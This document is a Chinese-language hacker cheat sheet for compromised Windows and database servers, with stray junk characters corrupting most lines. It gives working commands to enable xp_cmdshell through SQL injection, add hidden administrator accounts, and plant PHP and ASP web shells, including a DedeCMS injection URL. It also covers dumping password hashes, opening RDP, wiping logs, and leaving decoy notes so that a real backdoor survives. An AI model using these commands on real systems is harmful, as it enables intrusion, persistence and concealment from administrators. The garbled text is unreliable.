- g# `, z5 ~( x( i
1.net user administrator /passwordreq:no/ r: T; ~3 d/ a* E/ I
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 v- T+ {) a) J# _/ d2.比较巧妙的建克隆号的步骤7 t& r2 @9 v) C' P1 h9 f; J; C
先建一个user的用户
, ~6 E# s3 C; K; u/ l/ I0 L" j然后导出注册表。然后在计算机管理里删掉. ^4 E1 N5 N- l3 L6 G
在导入,在添加为管理员组- d, R& c- I: X- W
3.查radmin密码
. u% @2 A; D: n$ p4 S$ {5 L$ breg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
I1 d) U% Q5 F5 l2 ?1 S4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]) s0 t& w @9 ?
建立一个"services.exe"的项
0 g' f* E- ~& c- s: ?9 e再在其下面建立(字符串值)
' t# p, ^5 {( m* Q键值为mu ma的全路径) L+ y. q' { _& {# V# H6 }4 X6 ]
5.runas /user:guest cmd' s" C# c8 y/ F
测试用户权限!
1 R) F8 _1 u4 M* y6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?/ p: d0 ?3 `6 G5 p7 u
7.入侵后漏洞修补、痕迹清理,后门置放:
9 j: Y( ^* G2 k3 s' y基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门: J/ j( |" M2 n' [( V9 V% V( B0 a
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c' m3 Y v1 p9 P: K* i
. T1 v+ W8 `; T6 h/ d( [for example
' X4 ]( }% J: d/ }( p; `# T: G! a2 x, W; f3 l4 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'5 l' b4 _& l# P9 b
1 u: v5 b& H1 P. I& s3 S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'2 s9 l- Q. }5 w5 x2 k# K9 V0 e; W
6 m$ _* o6 \: d, H F9:MSSQL SERVER 2005默认把xpcmdshell 给ON了" n* L. `1 _ k) r* \9 C$ K1 L
如果要启用的话就必须把他加到高级用户模式) O8 j# s9 V9 e. d
可以直接在注入点那里直接注入
. j+ K$ T7 W7 e6 V7 ~id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
8 f; ^% { O; R! Y" S然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
( G7 v: F" h4 e9 x或者) Y% ^9 X8 J) K; B* `5 }$ l3 l
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, R" o3 X$ G6 X% \" a$ A: J, P" E" F来恢复cmdshell。& s; M% g9 O* ~* ^0 |# g5 E
6 R2 n7 N7 P4 V6 c3 q9 Y3 o分析器
6 c3 U/ M( T/ X3 B2 @3 bEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
$ K1 W' a5 j8 @% {% g然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")5 R& q: }3 J" P0 ?2 j* |
10.xp_cmdshell新的恢复办法! Z. G% p' B: N2 t8 w ~- l
xp_cmdshell新的恢复办法3 @3 \; W$ W* I# d. J
扩展储存过程被删除以后可以有很简单的办法恢复:
/ N" K$ {/ W0 c' D删除
( N- V% @4 \. ]drop procedure sp_addextendedproc
9 b: s. }6 O- t- |drop procedure sp_oacreate
( o; f5 [0 g1 f4 lexec sp_dropextendedproc 'xp_cmdshell'
: R7 @$ I9 ~! `4 Y0 A) u2 w& ]% [% c
恢复8 @6 i; a3 z$ ]: K6 q7 v/ v
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
- E+ C, \5 H7 G ^! M: Z2 \dbcc addextendedproc ("xp_cmdshell","xplog70.dll")3 C' w5 X* @$ o2 N% c# j
8 N& S8 U H% {: C# C这样可以直接恢复,不用去管sp_addextendedproc是不是存在$ @6 ^$ k8 n# r U8 R6 ?% [
" N7 X! V" x j$ s4 q& k" d
-----------------------------) j" C+ W8 Z l% V9 ^1 p; ?
# U3 f1 s+ X5 f- e$ E9 ^2 P
删除扩展存储过过程xp_cmdshell的语句:6 F, D: W" m. B& Q
exec sp_dropextendedproc 'xp_cmdshell'1 e: c1 H, \( L F) j
+ ^- e' w( A7 Z恢复cmdshell的sql语句( Z" A6 m! {$ P, v* g( S0 P
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'$ `5 i* d8 h+ g0 r
! Q9 I+ L7 G7 G0 M6 i1 T8 r8 h+ [
; V* [2 T! v* \% z- [$ ]开启cmdshell的sql语句2 N7 z# \0 x5 [2 u0 k
' q) R3 a: C' ]) N. e' N
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 w* k i# X% ?- O, o9 S4 t
- O8 r! J+ }; |0 w/ L" ]判断存储扩展是否存在
% T/ a' V, E4 J$ m5 b' ^5 D5 g0 Vselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'6 k& E7 b& { B& c8 ?5 d
返回结果为1就ok/ w. o" P2 |6 i; l. @1 T5 C2 H
0 H- `4 Z0 K. Z! i' x: n! S. q5 ^恢复xp_cmdshell$ D' X5 u7 p3 x5 |8 p
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: c; B0 C; ]! c, b9 s- L9 t返回结果为1就ok9 l+ ?5 E; |6 I9 H8 R% `& x% v
4 p: z: f% E9 J3 L1 L
否则上传xplog7.0.dll
- @2 {9 u$ B0 S( i% V% Rexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll': J8 X a/ W, j% o8 X0 Z
5 T: {, L3 Y, ], a7 l0 w) p堵上cmdshell的sql语句
$ {" R: g; o. o4 y. G3 E; X4 I' jsp_dropextendedproc "xp_cmdshel# O3 _9 z4 m& `
-------------------------
9 D* x6 H- G1 J/ u清除3389的登录记录用一条系统自带的命令:
( C1 ~% y" V5 C' Rreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
! x( V4 a+ t) r1 @
" t# l7 N, B1 ^- ]* H3 g' O; R+ J然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件3 z( w! y, _% w! _) g/ R( E
在 mysql里查看当前用户的权限$ E( z% L- C+ `7 p
show grants for
; d, ?0 O' g. x' ?3 x
; Y2 f3 ~1 w7 U4 G9 x+ I( S+ \以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
1 Z3 j. w& s- N% [. K! N7 p; b5 i: S7 v$ I3 d
2 n9 a. J2 ~& R6 |9 I. } K5 M: ZCreate USER 'itpro'@'%' IDENTIFIED BY '123';- E9 b0 [& g, j k
2 z* o7 E# W- O* @+ m. f* }- T& S
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION7 M: I D9 W# m( f8 o+ k
. U4 }# T" v7 V3 j6 c
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; P. E% b; n8 t3 t ]' _# Y
) Z# Z, T6 S/ f
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" Q1 ^# ` {. V
! q* {: m5 p: e. \; e3 w
搞完事记得删除脚印哟。2 m# K b3 a3 e3 F
0 E- v% T' y, ZDrop USER 'itpro'@'%';
6 l" o, ?# w+ S' r3 m
& m9 |1 \' ~8 L; j' N. R9 J& aDrop DATABASE IF EXISTS `itpro` ;+ I) `0 P- g7 O1 I1 g
& H* g( T; }) m. p$ A2 `
当前用户获取system权限
: L2 o% ^. ~' k0 hsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
% o2 p/ l& q# T1 X# K3 c0 A+ X3 hsc start SuperCMD8 T4 L% O3 c1 c* A9 Y* u/ `: ~
程序代码7 F% Z6 q: ^% ]: G4 p5 X$ B
<SCRIPT LANGUAGE="VBScript">
8 G3 V) W# L" M8 Lset wsnetwork=CreateObject("WSCRIPT.NETWORK")
3 j% m8 \; _$ x, M kos="WinNT://"&wsnetwork.ComputerName
- O) G# L1 v3 I/ s$ }Set ob=GetObject(os). f, j& a4 X& `: I X! S
Set oe=GetObject(os&"/Administrators,group")7 b j+ D" @! u6 x. ~
Set od=ob.Create("user","nosec")- N! @0 R0 Q2 e
od.SetPassword "123456abc!@#"
* b: ?: x" \9 H3 w8 p( Ood.SetInfo
; [( F) Y, b3 V- Z) wSet of=GetObject(os&"/nosec",user)$ O' H* B @5 {1 r* K9 n; D
oe.add os&"/nosec"
3 K6 i2 C4 p: J8 v- j</Script>3 t- n2 v; n, Y; ^8 g+ e2 m
<script language=javascript>window.close();</script>
x) o9 u. ]* k$ S E; g; C+ E* J; y. M( H* R, }+ v% L
5 e$ o) \ t( j' W6 o
9 l3 m( q& g3 O. t# V+ x0 ?9 F! R0 N
$ `3 y; k' N* E7 A- c突破验证码限制入后台拿shell5 l' W+ L: _2 e/ ?# \% }& b
程序代码
( }8 R# m& V" c1 dREGEDIT4
) J; o1 e2 A8 W+ g[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
8 R+ u$ s5 J, A. p, Y"BlockXBM"=dword:00000000
; n$ P! i3 t8 U4 W2 w8 ] c0 z0 C4 k* u1 a8 W/ w1 p
保存为code.reg,导入注册表,重器IE
* R! l4 v5 Y8 M/ s7 D, O! w4 {就可以了7 y5 l6 s/ ~: ?# ]5 F# a
union写马
6 V/ B5 D$ m7 r7 { X; }7 W M' T- j' Q程序代码
4 {: O2 q0 p6 I; awww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*& C2 `# H5 f4 G& H/ C
- ^5 i4 P: D9 b( L应用在dedecms注射漏洞上,无后台写马9 N3 U. v+ y' V! \9 Q
dedecms后台,无文件管理器,没有outfile权限的时候
# K8 @; c% g5 V( \+ a% @在插件管理-病毒扫描里! w! _/ ~8 E& I" P9 ?/ d- F
写一句话进include/config_hand.php里4 j2 {- N9 Y% P. \" h
程序代码 z5 Z, s- |& W
>';?><?php @eval($_POST[cmd]);?>7 S; y& a& j) B( O b4 y# n6 X
. D! {+ ^+ @( p0 B
* Q% y6 `' A# w& C3 b- x如上格式7 R& F: F2 E5 f8 _) ]- ^5 q, h
# p$ X; F, s P4 R k2 @
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解. y' C4 V. v& l6 e, [
程序代码0 a7 L& ~8 X+ r0 S. z
select username,password from dba_users;; n8 H9 Z# i' C' s
1 \: p( h& j" W" \
7 Y: k l( a$ K# [
mysql远程连接用户# K3 q6 J7 J; M
程序代码
- k" W/ V" h" C+ c" L, F1 H. l" D4 d8 H0 J9 P6 p
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
/ a0 ?( o; S7 z; y x0 x! MGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION5 v% W2 Q6 a3 n- O* W O4 e
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
$ e- G* Y1 [& LMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;; E# x: I$ O( |* S
8 T! p& o/ C6 j& N) \0 n# \
. z# D- r- M6 \* p/ ^( n, h
) `3 ] {( P4 m7 |1 P' E6 C6 a9 u
U+ z5 E+ x/ Y! f9 P
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0! E8 J7 M' q- e6 K! w
/ ?6 i* Z' s5 z* W: h8 y: v# z' g
1.查询终端端口
9 |1 ?$ W7 s! K* D6 l' t1 w8 p$ w) _& X
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
7 J) F3 @/ J T& J" a5 y1 c/ f" S' `: Y9 ]/ C3 O- |' {
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
5 z) w- H9 G( Q/ H* a- ztype tsp.reg! _7 q/ L: V$ p: H }
! p; M0 t+ ?/ ^* G- k5 J2.开启XP&2003终端服务
' S4 o, S" k/ ]. `. l5 i9 L! t* u0 @2 v8 ]
# y9 R8 O, ]4 L5 }8 p0 E: B% v3 ~
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f5 G$ R% {% n x o) ]
: P$ b. s. m' a+ L4 P+ _ J+ b6 s4 r
. y6 t! C7 ]! p ^& \! }+ nREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f( N# K! M2 P8 b
( G. g W$ B/ C2 C2 R9 d3.更改终端端口为20008(0x4E28)1 F3 q; c8 J$ c+ q, k
- k: N2 E7 ^. R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: Y k0 X: C4 [! Z- W. [7 l
4 B3 g( I* @2 s+ Z7 i1 b" |- `' o9 F! a* i
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f( d, v" |, C+ t- E9 }
4 r" S- \% h6 A& \, J: S) {4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制: g. }+ T. W' H& @, Y% _ k
) G/ s0 z+ \- _7 I% c1 u/ lREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
, Y& T2 B% m5 `) G* D
" v. Z1 I6 j4 N
6 P6 ~9 n7 l' Z1 j. t, X5.开启Win2000的终端,端口为3389(需重启)
& h! h5 P5 k* F x W! ?* k" ~" Q8 J6 W, q9 V& c" Z: G
echo Windows Registry Editor Version 5.00 >2000.reg
* V/ d, t/ \" f+ Kecho. >>2000.reg
9 ` D7 c+ m" y Y% R/ p, u( techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg * Y" ^4 Y# D3 @; i) ?) B
echo "Enabled"="0" >>2000.reg 6 U w4 \+ N. c; c4 a
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
9 H' n9 ^5 }% @, m, Aecho "ShutdownWithoutLogon"="0" >>2000.reg ! j3 Y8 P' @+ p6 M9 W6 e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
1 |/ V! ?& [- j: S+ k0 B. w' W0 pecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
# c) D) I0 E+ ?& s9 K8 Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
' q1 u: Q& Z2 oecho "TSEnabled"=dword:00000001 >>2000.reg
' Y4 V' Y: K. P! Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ; a/ k/ z; }- u
echo "Start"=dword:00000002 >>2000.reg
. ]( K Y: w% x( s: r! q0 t& zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg - Y. h6 W/ ]7 w3 w z+ x
echo "Start"=dword:00000002 >>2000.reg
3 E) e2 B) t3 Qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
- t8 L3 H6 d r0 c8 j3 V7 s' F$ Qecho "Hotkey"="1" >>2000.reg 8 D' C+ I7 I9 K0 F5 f9 ]/ x) v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
7 ^ N9 \6 A. A; e. o; Secho "ortNumber"=dword:00000D3D >>2000.reg ' C% C( z8 r* W+ n) H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
) @+ _5 c* k# h6 Secho "ortNumber"=dword:00000D3D >>2000.reg
6 U0 E. n; {9 j7 z& e8 w( C7 d+ W0 v2 H+ V
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
! R( C0 O: r8 T, Y& ^2 q0 Z @: I3 A5 [$ U
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
' W5 \0 o! j: z/ e% x- U(set inf=InstallHinfSection DefaultInstall)
T6 K$ F* @6 `3 }$ ~* _echo signature=$chicago$ >> restart.inf
1 `& P) d- i) C& o4 f1 w/ mecho [defaultinstall] >> restart.inf
8 o6 \3 H8 ?1 h7 ~: \rundll32 setupapi,%inf% 1 %temp%\restart.inf$ x$ D- V# {( O2 g% [
% L, m1 @! h. Z/ s) c& v. {; U* R5 B: }3 s' L7 Z
7.禁用TCP/IP端口筛选 (需重启)" J& ]5 t. K4 X3 v0 L
& m X5 k6 l3 i# ~3 `0 v
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f4 Y( T7 ?) {: J9 p
d) a- o, P: o [# h% m
8.终端超出最大连接数时可用下面的命令来连接
8 E1 @' \2 l$ ~, E6 c
( n. W8 | f8 H, F: Umstsc /v:ip:3389 /console
5 o- N- _6 m, }% o6 e/ g$ R% ]* h, a. b/ w5 L! g
9.调整NTFS分区权限
, C9 W6 b6 \3 h2 n% U2 z! ]8 H! K: ^, h4 s7 I' {; B( L# m
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)# @; o/ o8 {5 k3 H( F# U- F
. a9 l. h8 p. z9 wcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)" r- n% V) |: U' S1 K: z
1 E `4 n* z' J$ w------------------------------------------------------
7 l8 }& U/ T* M9 ]; ^( {- |3389.vbs
& ~7 O; M( Z3 B. r& H fOn Error Resume Next
; v9 t2 B" N( f$ _, Mconst HKEY_LOCAL_MACHINE = &H800000023 y/ ]: G1 P0 d* v& ]
strComputer = "."
6 L0 }0 b! D6 |0 K2 l; |3 USet StdOut = WScript.StdOut
4 D) y; F g2 k: fSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 y A8 @* F5 HstrComputer & "\root\default:StdRegProv")! [4 y$ d; _% {* R8 ~) ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
' ^& N5 W% n3 f$ ~oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
& G o3 F; `# K& lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"1 L% d5 k" y( V0 P1 Z
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath; \2 ^1 Y: Q; a5 b
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"2 K9 F7 d( e" R* U4 M; O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
: N5 R% D9 O0 g- p/ N& b1 H# NstrValueName = "fDenyTSConnections"9 v6 R) ]3 N) R. E8 x+ z9 u
dwValue = 0
9 x3 s4 O+ i7 |# x$ voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. ^1 l" B& q5 IstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 q; d, r+ [$ ]5 o. m0 @2 y
strValueName = "ortNumber" n8 i# G; w( a4 m- @0 Q% p7 \
dwValue = 3389
: h8 q$ G" e h1 }' U7 T$ G! [oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' R7 d+ w. \3 d1 F6 ]( HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"0 v; M9 J$ K8 c1 i/ t. n
strValueName = "ortNumber": r, N, x! r) n9 L6 s$ ?, M( m
dwValue = 3389' m/ a# X6 Y3 q. O0 ~+ `' q
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 Q" Y- l5 j' w- S" j9 I4 QSet R = CreateObject("WScript.Shell")
, y6 h! B* D0 l0 D9 U- @1 U: X; ], |R.run("Shutdown.exe -f -r -t 0") 1 U, [5 v1 \9 F1 `* B
+ G$ h0 ?2 u1 G7 c# G3 m& @6 J删除awgina.dll的注册表键值' _* o: |! a- m H5 ]/ G6 x
程序代码" T5 G5 g6 Q# ?+ k" M% g7 h5 C5 Q9 c- J
0 J, u6 Z8 f' ?& z I; w: L, Ereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f b0 w, @% X# W J
0 w1 S- `8 U- X2 j8 P2 Y4 n% w- Y
# a- U4 k. @; G- m5 k% u
. S$ G# ?* ~2 B0 X# g
5 \8 F* j1 S ?7 U1 E+ u) j% X程序代码
2 I1 k+ c8 j9 A8 UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash, F) L& Z# J% q' M! }+ v) c% d3 e
# H" ~2 a4 F+ U! f% v7 t8 A. b
设置为1,关闭LM Hash: g% E+ N: M" o2 N8 H
! z8 ]/ q5 @% M' T
数据库安全:入侵Oracle数据库常用操作命令$ {$ P/ T, [& V- X7 v* [' x, n
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。2 U+ S( H* J" N
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
- m) Y& ?. H5 q2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;0 F4 ~6 C9 U8 p+ }) t M
3、SQL>connect / as sysdba ;(as sysoper)或* y( |: t; L3 U2 T
connect internal/oracle AS SYSDBA ;(scott/tiger)* n+ t& M' [0 q( V2 ]
conn sys/change_on_install as sysdba;5 S1 P, p# J! @' \" j' I' r
4、SQL>startup; 启动数据库实例
4 s# y! K# ^/ H" c5 G# r; m5、查看当前的所有数据库: select * from v$database;
0 _: W/ X7 }# `' P) tselect name from v$database;
8 v9 g7 s) h, W6、desc v$databases; 查看数据库结构字段
3 o# {* u$ `2 m2 [" u7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
+ a o. l1 z b* l' h( ZSQL>select * from V_$PWFILE_USERS;
8 L& _& `! {$ d6 c4 d& o; y8 ?Show user;查看当前数据库连接用户8 u( \' Z+ o6 L8 I2 e
8、进入test数据库:database test;
( T; R# ^ \5 q7 O0 b6 V9、查看所有的数据库实例:select * from v$instance;5 E8 G9 V* s4 b5 I4 F: A7 ?
如:ora9i
& M' ]9 E" a/ J- f* k0 M! V, q) x10、查看当前库的所有数据表:: R/ Q( f% [; g7 e
SQL> select TABLE_NAME from all_tables;' E2 X, a3 p+ }* p; C
select * from all_tables;
. U" G x+ B2 V, y$ S: t& c( \SQL> select table_name from all_tables where table_name like '%u%';3 M* [& y/ I# F: M) I+ @
TABLE_NAME
% r! v9 ~0 x6 U3 e------------------------------
/ l$ L7 l, x0 y8 M8 E_default_auditing_options_/ S$ I" ]1 k% D* |, |, t
11、查看表结构:desc all_tables;7 K: B4 G o- {8 q# e
12、显示CQI.T_BBS_XUSER的所有字段结构:0 `5 E5 f J& [/ t
desc CQI.T_BBS_XUSER;8 ]( {! H- u: z- o0 M: V
13、获得CQI.T_BBS_XUSER表中的记录:
e s. G4 G) ?" O) hselect * from CQI.T_BBS_XUSER;
{. Z7 o7 t, P8 @14、增加数据库用户:(test11/test)- Z8 _9 c7 }1 t* w& I/ i2 s
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;" i. @! _$ p; _* V
15、用户授权:" c0 Z2 `% X; l3 q4 p
grant connect,resource,dba to test11;
W% t3 Y# I9 e6 p9 o2 e) j4 pgrant sysdba to test11;
9 L- E9 X+ F, y5 Jcommit;3 K: \# L o& M+ Z' F
16、更改数据库用户的密码:(将sys与system的密码改为test.)) L4 k+ K' Q, O$ P5 H3 K' H ?
alter user sys indentified by test;
' a" A9 X8 a& F8 Malter user system indentified by test;
. S! W0 P4 ^: d: g; W4 J/ A' l( l
7 K) r& L1 f3 w3 }7 f/ iapplicationContext-util.xml
+ ~5 N g% f- `: UapplicationContext.xml
. C' ^9 V8 W- N, f! U, Cstruts-config.xml
: @" s3 N4 C% Fweb.xml
3 s9 }7 h# Q3 sserver.xml
. p7 d, V D9 h5 N) Btomcat-users.xml# g$ Y. e- i$ S( ?
hibernate.cfg.xml
* P7 K, B( v2 J) A' [* P7 p9 zdatabase_pool_config.xml9 s' r/ ~5 R7 S7 j- s6 K
) }9 [/ v" h' ~1 P& U
$ C: H. w6 h% r' T* g\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
5 m4 f0 Z' l ^$ ~: X6 ^\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini2 ^3 c- ~: O" t) K
\WEB-INF\struts-config.xml 文件目录结构+ N1 v3 L7 j& t+ t" M4 N
3 W* ?- b/ Q, B4 z& }+ p3 a
spring.properties 里边包含hibernate.cfg.xml的名称
8 V, u; z, s. g2 Y3 f3 k% K. v X# _* [: l X! n
; {1 v/ d8 E7 x
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml) G. `$ m" L! x
2 @' _% [) e2 F2 _2 a0 q
如果都找不到 那就看看class文件吧。。
1 N6 Y" m3 \2 ]0 D! V; f" n: W% [
1 r8 p4 L: k3 m/ v: {( t测试1:
1 f7 F1 Q$ v6 A3 f7 zSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1/ m5 V* K& y& X1 W
$ i" V0 M& V% e7 v' O
测试2:
/ `* O+ y3 H! x; d. F" h4 P2 n
& u; I4 l9 Z% G2 }* hcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
, X2 A( @, k( t# A; J* J1 P1 Y$ u( m% D) Y. d3 b
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--& b) F: g" Q# X) H' _& D, g# U
- Q$ r8 A% ?9 J& j9 jSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; G# t9 g, K7 k$ d, b
! ^% V3 }# w5 J! U$ V查看虚拟机中的共享文件:
0 h2 ]7 z4 r/ ^+ D6 i$ a; Q- d- n在虚拟机中的cmd中执行
9 A( @ m3 K' h3 j" z\\.host\Shared Folders j |" Z9 X, z
- |& a# [7 l6 {
cmdshell下找终端的技巧5 y7 O+ x' a" j! j; p. ~
找终端: 1 q! y# H' n5 V' j9 k8 Q9 B( u
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
/ E8 b. j0 I8 t, X. ]5 s: j) N 而终端所对应的服务名为:TermService
7 ]; d& {0 @, |7 c- b第二步:用netstat -ano命令,列出所有端口对应的PID值!
: h( n0 R* E+ @* C, i# M& e 找到PID值所对应的端口
6 d+ n/ k; Y0 A4 P: q' P+ U: r, T$ N' {9 U( M M+ o( K
查询sql server 2005中的密码hash
4 L7 Y5 ] Y) `: [SELECT password_hash FROM sys.sql_logins where name='sa'6 Q* ^/ _2 k/ R h3 `; v b' c
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
9 L3 ~+ C. z' z& M4 yaccess中导出shell7 q" X7 g# b3 x2 N0 x# u/ }
5 R1 B6 F, }9 L# Y! f中文版本操作系统中针对mysql添加用户完整代码:- _7 B$ D& v* W2 v6 o
/ R; o+ m% [! ], c, g0 V' j) j
use test;
